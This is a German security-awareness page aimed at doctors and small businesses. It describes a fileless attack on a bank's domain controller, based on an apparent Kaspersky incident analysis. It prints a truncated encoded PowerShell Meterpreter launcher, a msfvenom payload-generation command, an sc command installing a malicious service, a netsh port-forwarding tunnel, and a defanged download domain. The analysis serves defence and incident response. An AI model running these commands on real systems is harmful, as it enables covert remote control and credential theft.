Achtung Ärzte und KMU's

Die Bedrohungslage hat sich exponentiell verschärft: Wichtige Geschäftsprozesse, vertrauliche Daten, finanzielle Ressourcen und die unterbrechungsfreie Verfügbarkeit von Anlagen und Systemen sind einem ständig wachsenden Risiko durch Zero-Second-Attacken ausgesetzt. Um das Risiko für Ihr Unternehmen zu verringern, müssen Sie smarter und besser gewappnet und informiert sein als Cyberkriminelle. Dabei brauchen Sie nicht mal mehr ein Ziel sein, um ein Opfer zu werden.

Dateilose Angriffe

Dateilose Angriffe

Dateilose Angriffe auf Unternehmen

Bei der Reaktion auf einen Vorfall muss ein Team aus Sicherheitsspezialisten den Spuren folgen, die Angreifer im Netzwerk hinterlassen haben. Diese Spuren finden sich in Protokollen,
Arbeitsspeichern und auf Festplatten. Leider stehen die benötigten Daten nur für eine begrenzte Zeit auf diesen Speichermedien zur Verfügung. Ein einziger Neustart eines angegriffenen Computers verhindert, dass dessen Arbeitsspeicher untersucht werden kann. Mehrere Monate nach einem Angriff wird die Analyse von Protokollen zu einem Glücksspiel, da diese im Laufe der Zeit rotieren. Festplatten speichern eine grosse Menge wichtiger Daten. Je nach den Aktivitäten der betroffenen Festplatten können Forensiker auch noch ein Jahr nach einem Angriff Daten extrahieren. Aus diesem Grund nutzen Angreifer Anti-Forensik-Techniken (oder einfach SDELETE), sowie arbeitsspeicherbasierte Malware, um ihre Aktivitäten während der Datensammlung zu verbergen. Ein gutes Beispiel für die Implementierung solcher Techniken ist Duqu2. Nach dem Ablegen auf der Festplatte und dem Ausführen des schädlichen MSI-Pakets wird dieses Paket durch Umbenennen von der Festplatte gelöscht. Ein Teil davon bleibt jedoch mit einer Code-Komponente im Arbeitsspeicher. Aus diesem Grund ist eine genaue Untersuchung des Arbeitsspeichers für die Analyse von Malware und ihren Eigenschaften von kritischer Bedeutung. Ein weiterer wichtiger Bestandteil eines Angriffs sind die Tunnel, die von den Angreifern im Netzwerk installiert werden. Cyberkriminelle (wie Carbanak oder GCMAN) verwenden z. B. PLINK für diesen Zweck. Duqu2 nutzte sogar einen speziellen Treiber. Vielleicht verstehen Sie nun, warum wir so erstaunt und beeindruckt waren, als wir im Rahmen der Reaktion auf einen Vorfall herausfanden, dass arbeitsspeicherbasierte Malware und Tunnel von den Angreifern mithilfe von Windows-Standarddienstprogrammen wie „SC“ und „NETSH“ implementiert worden waren.

 Beschreibung
Diese Bedrohung wurde ursprünglich vom Sicherheitsteam einer Bank entdeckt, nachdem Meterpreter-Code im physischen Arbeitsspeicher eines Domain Controllers (DC) gefunden worden war. Die Bezeichnungen von Kaspersky Lab für diese Art von Bedrohung lauten MEM:Trojan.Win32.Cometer und MEM:Trojan.Win32.Metasploit. Kaspersky Lab hat nach der Identifizierung dieses Angriffs an der forensischen Analyse teilgenommen und die Verwendung von PowerShell- Skripten in der Windows-Registrierung erkannt.
Außerdem stellte sich heraus, dass das Dienstprogramm NETSH dazu verwendet worden war, Datenverkehr vom Host des Opfers zum C2 des Angreifers zu leiten.
Wir wissen, dass das Metasploit Framework dazu verwendet wurde, Skripte wie das folgende zu erstellen:

%COMSPEC% /b /c start /b /min
powershell.exe -nop -w hidden -e
aQBmACgAWwBJAG4AdABQAHQ
AcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkA
ewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwA
LgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZ
QBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAc
wB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbw
B3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB
vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7
ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTA
HkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpA
GMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AE
kAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAG
UAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQ
AcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQA
ZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAa
gBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAd
AByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQ
A6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgB
pAG4AZwAoACcAJwBIADQAcwBJAEEARAB6ADgAeAAx
AGMAQwBBADcAVgBXAGUANAAvAGEATwBCAEQALwB1A
DUAWAA2AEgAYQBJAFQARQBrAEcAaQBrAEEARABiAG
wAawBxAFYATABnAEYAQwAyAE4AMwB3AEMAbgBGADQ
ASABEAHEAWgB4AEMARQBtAFQAcwBJAG…

Dieses Skript weist Arbeitsspeicher zu, löst WinAPIs auf und lädt das Dienstprogramm Meterpreter direkt in den Arbeitsspeicher herunter. Diese Art von Skripten kann mit dem Dienstprogramm Metasploit Msfvenom und den folgenden Befehlszeilenoptionen erzeugt werden:
• msfvenom -p windows/meterpreter/bind_ hidden_tcp AHOST=10.10.1.11 -f psh-cmd
Nach dem erfolgreichen Erstellen eines Skripts haben die Angreifer das Dienstprogramm SC verwendet,
um auf dem Ziel-Host einen schädlichen Dienst zu installieren, der das vorherige Skript ausführt. Hierzu kann beispielsweise der folgende Befehl verwendet werden:
• sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual

Sehr vieleUnternehmen auf der ganzen Welt sind betroffen, darunter Banken, Telekommunikationsunternehmen, Regierungsstellen, Spitäler und auch KMU's.

angriff

 Der nächste Schritt nach dem Installieren des schädlichen Diensts besteht in der Einrichtung von Tunneln für den Zugriff auf das infizierte System von Remote-Hosts aus, etwa mit folgendem Befehl:

netsh interface portproxy add v4tov4 listenport=4444
connectaddress=10.10.1.12 connectport=8080
listenaddress=0.0.0.0

Dies würde dazu führen, dass der gesamte Netzwerkverkehr von 10.10.1.11:4444 an 10.10.1.12:8080 weitergeleitet wird.
Diese Technik der Einrichtung von Proxy-Tunneln versetzt die Angreifer in die Lage, jeden mit PowerShell infizierten Host von Remote-Internet-Hosts aus zu steuern.
Die Verwendung der Dienstprogramme „SC“ und „NETSH“ erfordert Administratorberechtigungen für den lokalen und Remote-Host. Die Verwendung bösartiger PowerShell-Skripte erfordert ebenfalls die Ausweitung der erechtigungen und das Ändern von Ausführungsrichtlinien. Hierzu nutzten die Angreifer die Anmeldedaten von Wartungskonten mit Administratorberechtigungen (z. B. für Backups, den Dienst für die Remote-Aufgabenplanung usw.), die mit Mimikatz ausgespäht wurden.

Funktionen

 Die Analyse von Speicherauszügen und Windows-Registrierungen der betroffenen Systeme ermöglichte uns die Wiederherstellung von Meterpreter und Mimikatz. Mit diesen Tools wurden die Passwörter von Systemadministratoren und für die Remote-Verwaltung infizierter Hosts gesammelt.
Zur Extraktion des von den Angreifern verwendeten PowerShell-Codes aus den Speicherauszügen verwendeten wir die folgenden BASH-Befehle:

cat mal_powershell.ps1_4 | cut -f12 -d” “
| base64 -di | cut -f8 -d\’ | base64 -di
| zcat - | cut -f2 -d\( | cut -f2 -d\” |
less | grep \/ | base64 -di | hd

Dies ergab die folgende Payload:

programmierung

Teil eines Codes, der für den Download von Meterpreter von „adobeupdates.sytes[.]net“ verantwortlich ist.

Angriffsziele

Mithilfe des Kaspersky Security Network wurden sehr viele Unternehmensnetzwerke, deren Registrierung mit schädlichen PowerShell-Skripten infiziert war, gefunden. Diese werden als Trojan.Multi.GenAutorunReg.c und HEUR:Trojan.Multi.Powecod.a erkannt.
Es kann allerdings nicht bestätigt werden, dass alle diese Ziele vom selben Angreifer infiziert wurden.

DER PLAN: Cyber Kriminelle ermitteln Schwachstellen und planen dann Exploits. Wenn Cyber Kriminelle keine oder zuwenig Fachkenntnisse haben, organisieren Sie sich die Zugangsdaten auf dem Schwarzmarkt.

DIE AUSRÜSTUNG: Heutzutage sind Phishing-Mails und infizierte Webseiten die Modernen Waffen der Cyber Kriminellen, um heimlich Malware auf den Handys oder PC´s der Opfer zu installieren.

DIE VORBEREITUNG: Wenn die Ablenkung nicht funktioniert, warten die Banditen darauf, dass die potentiellen Opfer auf Ihre Online-Bankkonten zugreifen, um dann die Passwörter und Benutzernamen zu stehlen. Mit einem eingeschleusten Code fügen Sie heimlich Felder zum Banking-Portal hinzu und bitten um Handynummern.

DER ZUGANG: Cyber Kriminelle brauchen keine Zahlenkombinationen für den Tresor. Sie senden Ihnen eine SMS und geben sich als Ihre Bank aus. Sie bitten ihre Opfer eine Sicherheit-App zu installieren. Die infizierte App fängt SMS-Nachrichten einschliesslich Autorisierungscodes der Bank ab.

DER ÜBERFALL: Die Cyber Kriminellen haben den Benutzernamen, das Kennwort und den Authentifizierungscode. Jetzt können sie das Konto problemlos anzapfen und leeren.

DIE FLUCHT: Die Cyber Kriminellen arbeiten mit ausgeklügelter Software. Die mobile Malware löscht sich selbst und das, ohne eine Spur zu hinterlassen.